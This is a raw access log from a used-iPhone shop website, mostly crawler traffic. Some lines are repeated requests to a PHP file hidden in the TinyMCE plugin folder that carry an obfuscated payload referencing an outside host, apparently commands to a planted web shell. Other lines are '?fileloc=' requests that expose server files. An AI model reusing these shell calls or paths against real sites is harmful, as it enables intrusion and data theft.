104.22.1.33 - - [06/Dec/2025:04:01:31 +0100] "GET /?f=4119704929 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.40 - - [06/Dec/2025:04:01:33 +0100] "GET /?f=883719661 HTTP/1.0" 200 220667 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.184 - - [06/Dec/2025:04:01:41 +0100] "GET /?f=1816660450 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:01:44 +0100] "GET /?f=723374244 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.196 - - [06/Dec/2025:04:01:44 +0100] "GET /?f=2867913830 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.119.60 - - [06/Dec/2025:03:59:48 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333538382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938393938382q3662346561626366316330666230623066333237353961303035356532386237222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
108.162.238.44 - - [06/Dec/2025:04:01:50 +0100] "GET /?f=913793271 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.232.101 - - [06/Dec/2025:04:01:50 +0100] "GET /product-category/iphone-14/ HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (compatible; IbouBot/1.0; [email protected]; +https://ibou.io/iboubot.html)"
162.158.88.42 - - [06/Dec/2025:04:01:51 +0100] "GET /?f=1103815885 HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
172.71.166.40 - - [06/Dec/2025:04:01:53 +0100] "GET /?f=2386159901 HTTP/1.0" 200 208731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.148.157 - - [06/Dec/2025:04:00:09 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333630392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303030392q6432383039316633313962316461653064346230663135613530663136323139222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
198.41.227.173 - - [06/Dec/2025:04:02:14 +0100] "GET /?f=2064956146 HTTP/1.0" 200 198775 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.33 - - [06/Dec/2025:04:02:16 +0100] "GET /?f=3055746824 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.25 - - [06/Dec/2025:04:02:29 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard/class-import.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard HTTP/1.0" 200 24799 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.70.248.72 - - [06/Dec/2025:04:00:30 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333633302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303033302q6566303338336162383834306434383331346639356165396431613437363562222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.22.25 - - [06/Dec/2025:04:02:29 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/metabox/class-taxonomy-screen.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/metabox HTTP/1.0" 200 21903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.71.22.25 - - [06/Dec/2025:04:02:32 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/metabox/class-screen.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/metabox HTTP/1.0" 200 32344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.70.94.117 - - [06/Dec/2025:04:02:34 +0100] "GET /?f=3755705823 HTTP/1.0" 200 217174 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.25 - - [06/Dec/2025:04:02:35 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard/class-monitor-redirection.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard HTTP/1.0" 200 20993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.71.22.25 - - [06/Dec/2025:04:02:38 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard/class-optimization.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard HTTP/1.0" 200 22171 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.71.22.117 - - [06/Dec/2025:04:02:45 +0100] "GET /?f=846200763 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:02:50 +0100] "GET /?f=452273202 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.209 - - [06/Dec/2025:04:00:51 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333635312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303035312q6133626533346134626262303730663732656430663864393964356135613037222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.166.40 - - [06/Dec/2025:04:02:55 +0100] "GET /?f=762320098 HTTP/1.0" 200 233531 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.113 - - [06/Dec/2025:04:02:58 +0100] "GET /?f=2679659741 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:03:02 +0100] "GET /?f=4136382116 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:04:03:06 +0100] "GET /?f=1157369997 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:03:08 +0100] "GET /?f=1740680247 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:04:03:10 +0100] "GET /?o=46919393001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.209 - - [06/Dec/2025:04:01:12 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333637322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303037322q3738643264643862303966343437666538383532376562386139363433363337222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.113 - - [06/Dec/2025:04:03:12 +0100] "GET /?f=3284367152 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:04:03:14 +0100] "GET /?f=2453475266 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:03:15 +0100] "GET /?f=3739041660 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:03:17 +0100] "GET /?f=1144223371 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
198.41.227.173 - - [06/Dec/2025:04:03:18 +0100] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=1161729 HTTP/1.0" 200 213536 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.197 - - [06/Dec/2025:04:03:19 +0100] "GET /?f=4108611338 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:03:19 +0100] "GET /?f=1010542515 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.94.117 - - [06/Dec/2025:04:03:19 +0100] "GET /?f=1283108913 HTTP/1.0" 200 206613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.25 - - [06/Dec/2025:04:03:21 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard/class-compatibility.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/seo-by-rank-math/includes/admin/wizard HTTP/1.0" 200 28449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
172.71.124.30 - - [06/Dec/2025:04:03:23 +0100] "GET /?f=1012688347 HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
108.162.238.44 - - [06/Dec/2025:04:03:24 +0100] "GET /?o=87492357041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:04:03:25 +0100] "GET /?o=62060473101730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:04:03:27 +0100] "GET /?f=1955538715 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:03:28 +0100] "GET /?f=594188623 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:03:31 +0100] "GET /?o=112691819111730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.164.93 - - [06/Dec/2025:04:01:33 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333639332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303039332q3639313336663933646165333863363037313036653432633331633762303331222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.33 - - [06/Dec/2025:04:03:35 +0100] "GET /?f=967455749 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:04:03:35 +0100] "GET /?f=3791252313 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:04:03:35 +0100] "GET /?f=292155901 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.40 - - [06/Dec/2025:04:03:38 +0100] "GET /?f=3092559303 HTTP/1.0" 200 218372 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.33 - - [06/Dec/2025:04:03:44 +0100] "GET /?f=1165577150 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.209 - - [06/Dec/2025:04:01:54 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333731342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303131342q6163363630396532303839313961306636653435333231323330653662326534222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.166.40 - - [06/Dec/2025:04:03:57 +0100] "GET /?f=2157117877 HTTP/1.0" 200 250294 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.166.40 - - [06/Dec/2025:04:03:59 +0100] "GET /?f=301453847 HTTP/1.0" 200 198308 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.239.81 - - [06/Dec/2025:04:02:15 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333733352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303133352q6535396263653235386466626439393538353436363038366366306633303336222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.80.30 - - [06/Dec/2025:04:04:14 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-log1n.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 18700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:04:16 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-settings.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 50864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.94.117 - - [06/Dec/2025:04:04:16 +0100] "GET /?f=1568339251 HTTP/1.0" 200 224290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.33 - - [06/Dec/2025:04:04:19 +0100] "GET /?o=71601081021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:04:19 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-config-sample.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 19813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.22.1.156 - - [06/Dec/2025:04:04:20 +0100] "GET /?f=1106912285 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:04:35 +0100] "GET /?f=2399752855 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.243.54 - - [06/Dec/2025:04:02:36 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333735362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303135362q6265623464383062646331323437346166316361366536356461376162383936222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.71.183 - - [06/Dec/2025:04:04:37 +0100] "GET /?f=163599389 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:04:39 +0100] "GET /?f=3025527983 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.102.94 - - [06/Dec/2025:04:04:39 +0100] "GET / HTTP/1.0" 200 63847 "http://iphonesused.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.71.30.99 - - [06/Dec/2025:04:04:42 +0100] "GET /?f=2113494612 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:04:04:44 +0100] "GET /?f=4015712024 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:04:44 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-activate.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 25103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.117 - - [06/Dec/2025:04:04:46 +0100] "GET /?f=2352264928 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:04:46 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-mail.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 26013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.94.117 - - [06/Dec/2025:04:04:48 +0100] "GET /?o=112325225021730 HTTP/1.0" 200 225897 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:04:49 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fxmlrpc.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 19988 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.251.209 - - [06/Dec/2025:04:02:57 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333737372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303137372q3133353561663862383732353037336631343763386333356261376262313231222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.30.99 - - [06/Dec/2025:04:04:59 +0100] "GET /?o=93995051041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:04:05:01 +0100] "GET /?f=3661533050 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:05:08 +0100] "GET /?f=3258143496 HTTP/1.0" 200 198141 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.41.227.173 - - [06/Dec/2025:04:05:09 +0100] "GET /?f=1445519793 HTTP/1.0" 200 202854 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.120.51 - - [06/Dec/2025:04:05:10 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Foptions.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 18030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.41 - - [06/Dec/2025:04:05:10 +0100] "GET /?f=4179897035 HTTP/1.0" 200 211568 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.44 - - [06/Dec/2025:04:05:11 +0100] "GET /?o=39989888091730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:04:05:11 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fpages.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 17756 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.120.51 - - [06/Dec/2025:04:05:14 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-trackback.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 22231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.113 - - [06/Dec/2025:04:05:16 +0100] "GET /?f=3631539643 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
141.101.68.72 - - [06/Dec/2025:04:03:18 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333739382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303139382q6237616637663633366438333635303736653537646261623830633339363436222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.33 - - [06/Dec/2025:04:05:18 +0100] "GET /?f=3937440149 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:05:18 +0100] "GET /?f=1870580803 HTTP/1.0" 200 218320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.117 - - [06/Dec/2025:04:05:23 +0100] "GET /?f=418393265 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.206 - - [06/Dec/2025:04:05:28 +0100] "GET /?f=4177199041 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
